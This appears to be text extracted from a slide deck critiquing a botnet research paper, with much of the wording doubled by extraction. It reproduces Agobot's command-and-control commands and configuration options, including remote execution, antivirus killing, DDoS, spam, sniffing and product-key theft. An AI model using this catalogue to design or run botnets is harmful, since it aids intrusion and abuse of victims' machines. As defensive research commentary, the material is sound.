Offense: Brute ForceOffense: Brute Force

A Multifaceted Approach to A Multifaceted Approach to Understanding the Botnet Understanding the Botnet

PhenomenonPhenomenon(Rajab/Zarfoss/Monrose/Terzis)(Rajab/Zarfoss/Monrose/Terzis)

Enough Data?Enough Data?

Research paper states: Research paper states: 800,000 DNS domains examined800,000 DNS domains examined85,000 servers botnet-infected85,000 servers botnet-infected65 IRC server domain names65 IRC server domain names

Is above data statistically significant?Is above data statistically significant?450,000,000 hosts via DNS (isc.org)450,000,000 hosts via DNS (isc.org)Over 150,000,000 domain names existOver 150,000,000 domain names exist47,700,000 .com domains (1% probed)47,700,000 .com domains (1% probed)

Realtime TrackingRealtime Tracking

Source: Shadowserver.org

Longitudinal TrackingLongitudinal Tracking

Research paper states: Research paper states: 65 IRC server domain names65 IRC server domain names85,000 servers infected by bots85,000 servers infected by botsType-II botnets onlyType-II botnets only

Shadowserver.org tracking (2+ years):Shadowserver.org tracking (2+ years):1800 active botnets daily1800 active botnets daily3,000,000 active bots daily3,000,000 active bots dailyUpdates every 15 minutesUpdates every 15 minutes

Where’s the 40%?Where’s the 40%?

Research paper exclusively WinTelResearch paper exclusively WinTelEasier to obtain bot binaries?Easier to obtain bot binaries?

Most internet servers are Linux-basedMost internet servers are Linux-basedHard to ignore the majorityHard to ignore the majority

Worm or Trojan backdoors exploitedWorm or Trojan backdoors exploitedDefenses are already weakenedDefenses are already weakened

Botnet sizeBotnet size

Footprint vs. effective sizeFootprint vs. effective sizeThe paper complains that the footprint is The paper complains that the footprint is

much larger than the effective size.much larger than the effective size.

So? Bots are trying to stay off DNSBL So? Bots are trying to stay off DNSBL (black lists) and be more stealthy.(black lists) and be more stealthy.

Sections of footprint may be rented outSections of footprint may be rented out

Botmaster concernsBotmaster concerns

Source: swatit.org

C&C StealthC&C Stealth

Botmasters want to remain hiddenBotmasters want to remain hidden IRC-based isn’t the only wayIRC-based isn’t the only wayPeer-to-peer systems hide IP source addrPeer-to-peer systems hide IP source addrVirtualization of C&CVirtualization of C&C

Dynamic web serversDynamic web serversNetwork creation/reconfigurationNetwork creation/reconfigurationCome and go quicklyCome and go quicklyDifficult to traceDifficult to traceWorks for honeypots, why not botnets?Works for honeypots, why not botnets?

Gray-box testingGray-box testing

Only binary bot behavior studiedOnly binary bot behavior studiedResults limited by mimicing IRC stateResults limited by mimicing IRC stateResearch emphasized automation over Research emphasized automation over

thoroughnessthoroughnessSource code or disassembly reveals moreSource code or disassembly reveals moreBehavior may be different in honeynetBehavior may be different in honeynet

Agobot C&CAgobot C&CCommand Description:

bot.about Displays information (e.g., version) about the bot code

bot.die Terminates the bot

bot.dns Resolves IP/hostname via DNS

bot.execute Makes the bot execute a specific .exe

bot.id Displays the ID of the current bot code

bot.nick Changes the nickname of the bot

bot.open Opens a specified file

bot.remove Removes the bot from the host

bot.removeallbut Removes the bot if ID does not match

bot.rndnick Makes the bot generate a new random nickname

bot.status Echo bot status information

bot.sysinfo Echo the bot’s system information

bot.longuptime If uptime > 7 days then bot will respond

bot.highspeed If speed> 5000 then bot will respond

bot.quit Quits the bot

bot.flushdns Flushes the bot’s DNS cache

bot.secure Delete specified shares and disable DCOM

bot.unsecure Enable specified shares and enables DCOM

bot.command Executes a specified command with system()

Variable Description:bot ftrans port Set bot - file transfer portbot ftrans port ftp Set bot - file transfer port for FTPsi chanpass IRC server information - channel passwordsi mainchan IRC server information - main channelsi nickprefix IRC server information - nickname prefixsi port IRC server information - server portsi server IRC server information - server addresssi servpass IRC server information - server passwordsi usessl IRC server information - use SSL ?si nick IRC server information - nicknamebot version Bot - versionbot filename Bot - runtime filenamebot id Bot - current IDbot prefix Bot - command prefixbot timeo Bot - timeout for receiving (in milliseconds)bot seclogin Bot - enable login only by channel messagesbot compnick Bot - use the computer name as a nicknamebot randnick Bot - random nicknames of letters and numbersbot meltserver Bot - melt the original server filebot topiccmd Bot - execute topic commandsdo speedtest Bot - do speed test on startupdo avkill Bot - enable anti-virus killdo stealth Bot - enable stealth operationas valname Autostart - value nameas enabled Autostart - enabledas service Autostart - start as serviceas service name Autostart - short service namescan maxthreads Scanner - maximum number of threadsscan maxsockets Scanner - Maximum number of socketsddos maxthreads DDoS - maximum number of threadsredir maxthreads Redirect - maximum number of threadsidentd enabled IdentD - enable the servercdkey windows Return windows product keys on cdkey.getscaninfo chan Scanner - output channelscaninfo level Info level 1 (less) - (3) morespam aol channel AOL spam - channel namespam aol enabled AOL spam - enabled ?sniffer enabled Sniffer - enabled ?sniffer channel Sniffer - output channelvuln channel Vulnerability daemon sniffer channelinst polymorph Installer - polymorphoic on install ?

Botnet evolutionBotnet evolution

Polymorphic bot codePolymorphic bot codeGmail as control protocolGmail as control protocolSSL usageSSL usage Invisible to network inspectionInvisible to network inspectionXML/RSS messagesXML/RSS messagesExploit IPv6 flawsExploit IPv6 flaws